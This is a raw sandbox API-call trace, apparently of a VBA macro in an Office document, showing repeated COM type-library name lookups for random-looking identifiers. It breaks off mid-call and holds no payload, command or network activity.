[0068.832] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_NAZ1GBZA", lHashVal=0x100978, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.832] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.832] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.832] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_NAZ1GBZA", lHashVal=0x100978, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.832] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.832] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.832] IUnknown:Release (This=0x665ba50) returned 0xd [0068.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc298a, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_NAZ1GBZA") returned 16 [0068.832] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_NAZ1GBZA", lHashVal=0x100978, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4e005f00720061, ppTypeComp=0x47003100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4e005f00720061, ppTypeComp=0x47003100000000, pDummy=0x0) returned 0x0 [0068.832] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a60faa | out: _Dst=0x144ec0) returned 0x0 [0068.832] ITypeComp:RemoteBind (in: This=0x665ba60, szName="WAGAGA", lHashVal=0x10d5f1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60ffe, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="WAGAGA") returned 7 [0068.832] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="WAGAGA", lHashVal=0x10d5f1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60ffe, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="WAGAGA") returned 7 [0068.833] ITypeComp:RemoteBind (in: This=0x665bd30, szName="WAGAGA", lHashVal=0x10d5f1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.833] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WAGAGA") returned 0x10d5f1 [0068.833] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="WAGAGA" | out: _Dst="WAGAGA") returned 0x0 [0068.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="WAGAGA") returned 7 [0068.833] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.833] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="WAGAGA", lHashVal=0x10d5f1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.833] IUnknown:Release (This=0x665ba50) returned 0xd [0068.833] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.833] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="WAGAGA", lHashVal=0x10d5f1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.833] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.833] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.833] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="WAGAGA", lHashVal=0x10d5f1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.833] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.833] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.833] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="WAGAGA", lHashVal=0x10d5f1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.833] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60ffe, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="WAGAGA") returned 7 [0068.833] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="WAGAGA", lHashVal=0x10d5f1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.833] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.833] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a60ffe | out: _Dst=0x67c2d40) returned 0x0 [0068.833] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_WAGAGA") returned 0x10505b [0068.833] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_WAGAGA" | out: _Dst="_B_var_WAGAGA") returned 0x0 [0068.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_WAGAGA") returned 14 [0068.833] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.833] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_WAGAGA", lHashVal=0x10505b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.833] IUnknown:Release (This=0x665ba50) returned 0xd [0068.833] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.833] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_WAGAGA", lHashVal=0x10505b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.833] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.833] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.833] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_WAGAGA", lHashVal=0x10505b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.834] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.834] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.834] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_WAGAGA", lHashVal=0x10505b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.834] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.834] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.834] IUnknown:Release (This=0x665ba50) returned 0xd [0068.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc29ba, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_WAGAGA") returned 14 [0068.834] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_WAGAGA", lHashVal=0x10505b, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x57005f00720061, ppTypeComp=0x47004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x57005f00720061, ppTypeComp=0x47004100000000, pDummy=0x0) returned 0x0 [0068.834] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a60ffe | out: _Dst=0x144ec0) returned 0x0 [0068.834] ITypeComp:RemoteBind (in: This=0x665ba60, szName="mUGGoUUA", lHashVal=0x108a0c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61026, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="mUGGoUUA") returned 9 [0068.834] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="mUGGoUUA", lHashVal=0x108a0c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61026, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="mUGGoUUA") returned 9 [0068.834] ITypeComp:RemoteBind (in: This=0x665bd30, szName="mUGGoUUA", lHashVal=0x108a0c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.834] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mUGGoUUA") returned 0x108a0c [0068.834] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="mUGGoUUA" | out: _Dst="mUGGoUUA") returned 0x0 [0068.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="mUGGoUUA") returned 9 [0068.834] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.834] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="mUGGoUUA", lHashVal=0x108a0c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.834] IUnknown:Release (This=0x665ba50) returned 0xd [0068.834] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.834] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="mUGGoUUA", lHashVal=0x108a0c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.834] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.834] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.834] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="mUGGoUUA", lHashVal=0x108a0c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.834] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.834] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.834] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="mUGGoUUA", lHashVal=0x108a0c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.835] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61026, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="mUGGoUUA") returned 9 [0068.835] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="mUGGoUUA", lHashVal=0x108a0c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.835] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.835] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a61026 | out: _Dst=0x67c2d40) returned 0x0 [0068.835] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_mUGGoUUA") returned 0x106195 [0068.835] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_mUGGoUUA" | out: _Dst="_B_var_mUGGoUUA") returned 0x0 [0068.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_mUGGoUUA") returned 16 [0068.835] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.835] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_mUGGoUUA", lHashVal=0x106195, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.835] IUnknown:Release (This=0x665ba50) returned 0xd [0068.835] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.835] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_mUGGoUUA", lHashVal=0x106195, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.835] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.835] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.835] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_mUGGoUUA", lHashVal=0x106195, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.835] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.835] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.835] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_mUGGoUUA", lHashVal=0x106195, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.835] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.835] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.835] IUnknown:Release (This=0x665ba50) returned 0xd [0068.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc29ea, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_mUGGoUUA") returned 16 [0068.835] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_mUGGoUUA", lHashVal=0x106195, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x6f004700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x6f004700000000, pDummy=0x0) returned 0x0 [0068.835] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a61026 | out: _Dst=0x144ec0) returned 0x0 [0068.835] ITypeComp:RemoteBind (in: This=0x665ba60, szName="wQQAwU_", lHashVal=0x10a439, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6107a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="wQQAwU_") returned 8 [0068.835] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="wQQAwU_", lHashVal=0x10a439, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6107a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="wQQAwU_") returned 8 [0068.836] ITypeComp:RemoteBind (in: This=0x665bd30, szName="wQQAwU_", lHashVal=0x10a439, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.836] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wQQAwU_") returned 0x10a439 [0068.836] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="wQQAwU_" | out: _Dst="wQQAwU_") returned 0x0 [0068.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="wQQAwU_") returned 8 [0068.836] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.836] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="wQQAwU_", lHashVal=0x10a439, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.836] IUnknown:Release (This=0x665ba50) returned 0xd [0068.836] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.836] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="wQQAwU_", lHashVal=0x10a439, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.836] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.836] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.836] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="wQQAwU_", lHashVal=0x10a439, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.836] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.836] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.836] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="wQQAwU_", lHashVal=0x10a439, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.836] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6107a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="wQQAwU_") returned 8 [0068.836] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="wQQAwU_", lHashVal=0x10a439, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.836] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.836] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a6107a | out: _Dst=0x67c2d40) returned 0x0 [0068.836] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_wQQAwU_") returned 0x10a7bd [0068.836] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_wQQAwU_" | out: _Dst="_B_var_wQQAwU_") returned 0x0 [0068.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_wQQAwU_") returned 15 [0068.836] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.836] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_wQQAwU_", lHashVal=0x10a7bd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.836] IUnknown:Release (This=0x665ba50) returned 0xd [0068.836] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.836] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_wQQAwU_", lHashVal=0x10a7bd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.836] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.836] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.836] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_wQQAwU_", lHashVal=0x10a7bd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.836] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.836] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.836] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_wQQAwU_", lHashVal=0x10a7bd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.837] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.837] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.837] IUnknown:Release (This=0x665ba50) returned 0xd [0068.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2a1a, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_wQQAwU_") returned 15 [0068.837] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_wQQAwU_", lHashVal=0x10a7bd, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x77004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x77004100000000, pDummy=0x0) returned 0x0 [0068.837] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a6107a | out: _Dst=0x144ec0) returned 0x0 [0068.837] ITypeComp:RemoteBind (in: This=0x665ba60, szName="uABoA4A", lHashVal=0x10ceec, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61052, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="uABoA4A") returned 8 [0068.837] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="uABoA4A", lHashVal=0x10ceec, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61052, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="uABoA4A") returned 8 [0068.837] ITypeComp:RemoteBind (in: This=0x665bd30, szName="uABoA4A", lHashVal=0x10ceec, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.837] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uABoA4A") returned 0x10ceec [0068.837] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="uABoA4A" | out: _Dst="uABoA4A") returned 0x0 [0068.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="uABoA4A") returned 8 [0068.837] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.837] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="uABoA4A", lHashVal=0x10ceec, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.837] IUnknown:Release (This=0x665ba50) returned 0xd [0068.837] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.837] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="uABoA4A", lHashVal=0x10ceec, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.837] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.837] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.837] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="uABoA4A", lHashVal=0x10ceec, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.837] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.837] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.837] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="uABoA4A", lHashVal=0x10ceec, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.837] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61052, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="uABoA4A") returned 8 [0068.837] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="uABoA4A", lHashVal=0x10ceec, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: 